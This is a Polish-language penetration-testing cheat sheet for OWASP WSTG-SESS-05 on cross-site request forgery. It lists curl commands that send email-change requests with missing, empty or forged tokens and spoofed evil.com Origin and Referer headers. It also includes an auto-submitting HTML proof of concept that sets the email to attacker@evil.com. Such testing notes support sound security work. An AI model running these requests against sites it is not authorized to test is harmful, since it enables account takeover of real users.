================================================================================
WSTG-SESS-05 — Testing for Cross Site Request Forgery (CSRF)
================================================================================
CELE:
- Okreslenie czy requesty moga byc inicjowane w imieniu uzytkownika bez jego wiedzy
- Sprawdzenie obecnosci i walidacji tokenow anty-CSRF
- Testowanie skutecznosci ochrony przed CSRF

================================================================================
KOMENDY
================================================================================

# --- Sprawdzenie obecnosci tokenu CSRF w formularzach ---
curl -s TARGET/form-page | grep -iE "csrf|token|_token|authenticity"

# --- Pobranie tokenu CSRF i proba uzycia go w innym kontekscie ---
CSRF_TOKEN=$(curl -s -c cookies.txt TARGET/form-page | grep -oP 'name="csrf_token" value="\K[^"]+')
echo "CSRF Token: $CSRF_TOKEN"

# --- Test bez tokenu CSRF ---
curl -v -b cookies.txt -X POST TARGET/change-email -d "email=attacker@evil.com" 2>&1

# --- Test z pustym tokenem CSRF ---
curl -v -b cookies.txt -X POST TARGET/change-email -d "email=attacker@evil.com&csrf_token=" 2>&1

# --- Test z nieprawidlowym tokenem CSRF ---
curl -v -b cookies.txt -X POST TARGET/change-email -d "email=attacker@evil.com&csrf_token=INVALID_TOKEN" 2>&1

# --- Test CSRF z metoda GET zamiast POST ---
curl -v -b cookies.txt "TARGET/change-email?email=attacker@evil.com" 2>&1

# --- Sprawdzenie naglowka SameSite cookie ---
curl -s -I TARGET | grep -i "set-cookie" | grep -i "samesite"

# --- Sprawdzenie walidacji naglowka Origin/Referer ---
curl -v -b cookies.txt -H "Origin: https://evil.com" -X POST TARGET/change-email -d "email=attacker@evil.com&csrf_token=$CSRF_TOKEN" 2>&1
curl -v -b cookies.txt -H "Referer: https://evil.com/page" -X POST TARGET/change-email -d "email=attacker@evil.com&csrf_token=$CSRF_TOKEN" 2>&1

# --- Test CSRF z usunietym naglowkiem Referer ---
curl -v -b cookies.txt -H "Referer:" -X POST TARGET/change-email -d "email=attacker@evil.com" 2>&1

# --- Generowanie CSRF PoC (HTML) ---
cat << 'CSRF_POC'
<html>
<body>
<form action="TARGET/change-email" method="POST">
  <input type="hidden" name="email" value="attacker@evil.com" />
  <input type="submit" value="Click me" />
</form>
<script>document.forms[0].submit();</script>
</body>
</html>
CSRF_POC

# --- Test czy token CSRF jest powiazany z sesja ---
# Zaloguj sie na konto A, pobierz token
# Uzyj tokenu z konta A w requescie z sesja konta B

# --- Sprawdzenie CSRF na endpointach API (JSON) ---
curl -v -b cookies.txt -H "Content-Type: application/json" -X POST TARGET/api/change-email -d '{"email":"attacker@evil.com"}' 2>&1

================================================================================
KOMENDY Z WORDLISTAMI
================================================================================

# --- PayloadsAllTheThings - materialy i techniki CSRF ---
# Referencja: Desktop/WSTG/PayloadsAllTheThings-master/Cross-Site Request Forgery/README.md
# Zawiera przyklady payloadow CSRF w roznych formatach (HTML, JSON, multipart)

# --- Przyklady obrazkow CSRF PoC z PayloadsAllTheThings ---
ls Desktop/WSTG/PayloadsAllTheThings-master/Cross-Site\ Request\ Forgery/Images/

================================================================================
WERYFIKACJA MANUALNA (Burp Suite / Przegladarka / DevTools)
================================================================================
1. W Burp Proxy przechwyc request zmieniajacy dane (np. zmiana email/hasla)
2. PPM -> Engagement Tools -> Generate CSRF PoC
3. Otworz wygenerowany PoC w przegladarce z zalogowana sesja
4. Sprawdz czy akcja zostala wykonana bez interakcji uzytkownika
5. Usun token CSRF z requestu w Burp Repeater - sprawdz czy serwer odrzuca
6. Przetestuj rozne metody bypass: usun Referer, zmien Origin, uzyj GET zamiast POST
7. Sprawdz czy token CSRF jest unikalny per sesja i per request
8. Przetestuj czy token z jednej sesji dziala w innej
